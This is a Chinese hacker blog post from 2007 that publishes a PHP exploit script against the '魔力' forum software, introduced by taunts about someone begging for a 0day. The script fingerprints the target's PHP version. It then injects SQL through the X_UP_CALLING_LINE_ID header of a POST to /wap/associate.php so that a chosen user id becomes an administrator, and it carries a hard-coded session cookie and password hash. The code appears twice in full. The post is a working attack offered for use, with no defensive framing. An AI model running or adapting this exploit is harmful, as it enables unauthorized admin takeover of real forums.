2007-04-06 17:22:13 by: h4x0r
For Expliot 魔力论坛
P.S:7j 那放出来滴.
不知道哪个鸟人在群里还在那叫唤
(魔力0day 魔力0day ...吼半天还是没人理他。可怜的人。)
Comments Feed: http://www.4evil.org/feed.asp?q=comment&id=847
不知道哪个鸟人在群里还在那叫唤
(魔力0day 魔力0day ...吼半天还是没人理他。可怜的人。)
<?php
print_r("
+------------------------------------------------------------------+
Exploit For 魔力
Just For Fun :)
+------------------------------------------------------------------+
");
ini_set("max_execution_time",0);
error_reporting(7);
$sitepath="$argv[2]";
$server="$argv[1]";
$id="$argv[3]";
$cookie='redbbssessionid=5604730f9608848e; cnzz02=11; rtime=0; ltime=1168828899792; cnzz_eid=75851673-; redbbsuserid=52863; redbbspassword=5d0a98dc161ba9e55208f34e2b2ef473; redbbslanguage=zh-cn ';
$useragent='Opera/9.01 (Windows NT 5.1; U; zh-cn)';
preg_match('/X-Powered-By: php\/(.+)/ie',send("",'index.php'),$php);
if(!$php[1]) {
$tmppath='index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000';
$resp=send('',"$tmppath");
preg_match('/\<th\>php (.+)Quality Assurance Team/i',$resp,$php);
}
echo "We Got php version:\t".$php[1]."";
if(preg_match('/(\s*)5\./i',$php[1])) echo "Maybe It is VUL";
else die("It is Not Vul Or Post The EviL Data By Your Self");
$evildata="0',usergroupid=4 where id=$id/*";
$script='/wap/associate.php?do=1';
$resp=iconv('UTF-8','gbk',send('',$script));
if(strpos($resp,'操作成功完成')) echo "Expoilt Over! :) Id=$id May be Is Admin Now";
else die("Bad Luck! Are You Loggin? ");
function send($cmd,$script)
{
global $useragent,$sitepath,$server,$cookie,$evildata,$count;
$path =$sitepath.$script;
$count=$count+1;
$message = "POST ".$path." HTTP/1.1";
$message .= "Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1";
$message .= "Accept-Language: zh-CN,zh;q=0.9,en;q=0.8";
$message .= "Referer: http://".$server.$path."";
$message .= "Content-Type: application/x-www-form-urlencoded";
$message .= "Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1";
$message .= "Host: ".$server."";
$message .= "User-Agent: ".$useragent."";
$message .= "Connection: Keep-Alive";
$message .= "X_UP_CALLING_LINE_ID: ".$evildata."";
$message .= "Cookie: ".$cookie."";
$message .= "";
$fd = @fsockopen( $server, 80 );
@fputs($fd,$message);
$resp = "<-_->";
if($fd)
{
while(!@feof($fd)) {
$resp .= @fread($fd,1024);
}
}
@fclose($fd);
$resp .="</-_->";
return $resp;
}
?>
print_r("
+------------------------------------------------------------------+
Exploit For 魔力
Just For Fun :)
+------------------------------------------------------------------+
");
ini_set("max_execution_time",0);
error_reporting(7);
$sitepath="$argv[2]";
$server="$argv[1]";
$id="$argv[3]";
$cookie='redbbssessionid=5604730f9608848e; cnzz02=11; rtime=0; ltime=1168828899792; cnzz_eid=75851673-; redbbsuserid=52863; redbbspassword=5d0a98dc161ba9e55208f34e2b2ef473; redbbslanguage=zh-cn ';
$useragent='Opera/9.01 (Windows NT 5.1; U; zh-cn)';
preg_match('/X-Powered-By: php\/(.+)/ie',send("",'index.php'),$php);
if(!$php[1]) {
$tmppath='index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000';
$resp=send('',"$tmppath");
preg_match('/\<th\>php (.+)Quality Assurance Team/i',$resp,$php);
}
echo "We Got php version:\t".$php[1]."";
if(preg_match('/(\s*)5\./i',$php[1])) echo "Maybe It is VUL";
else die("It is Not Vul Or Post The EviL Data By Your Self");
$evildata="0',usergroupid=4 where id=$id/*";
$script='/wap/associate.php?do=1';
$resp=iconv('UTF-8','gbk',send('',$script));
if(strpos($resp,'操作成功完成')) echo "Expoilt Over! :) Id=$id May be Is Admin Now";
else die("Bad Luck! Are You Loggin? ");
function send($cmd,$script)
{
global $useragent,$sitepath,$server,$cookie,$evildata,$count;
$path =$sitepath.$script;
$count=$count+1;
$message = "POST ".$path." HTTP/1.1";
$message .= "Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1";
$message .= "Accept-Language: zh-CN,zh;q=0.9,en;q=0.8";
$message .= "Referer: http://".$server.$path."";
$message .= "Content-Type: application/x-www-form-urlencoded";
$message .= "Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1";
$message .= "Host: ".$server."";
$message .= "User-Agent: ".$useragent."";
$message .= "Connection: Keep-Alive";
$message .= "X_UP_CALLING_LINE_ID: ".$evildata."";
$message .= "Cookie: ".$cookie."";
$message .= "";
$fd = @fsockopen( $server, 80 );
@fputs($fd,$message);
$resp = "<-_->";
if($fd)
{
while(!@feof($fd)) {
$resp .= @fread($fd,1024);
}
}
@fclose($fd);
$resp .="</-_->";
return $resp;
}
?>
Comments Feed: http://www.4evil.org/feed.asp?q=comment&id=847
There is no comment on this article.
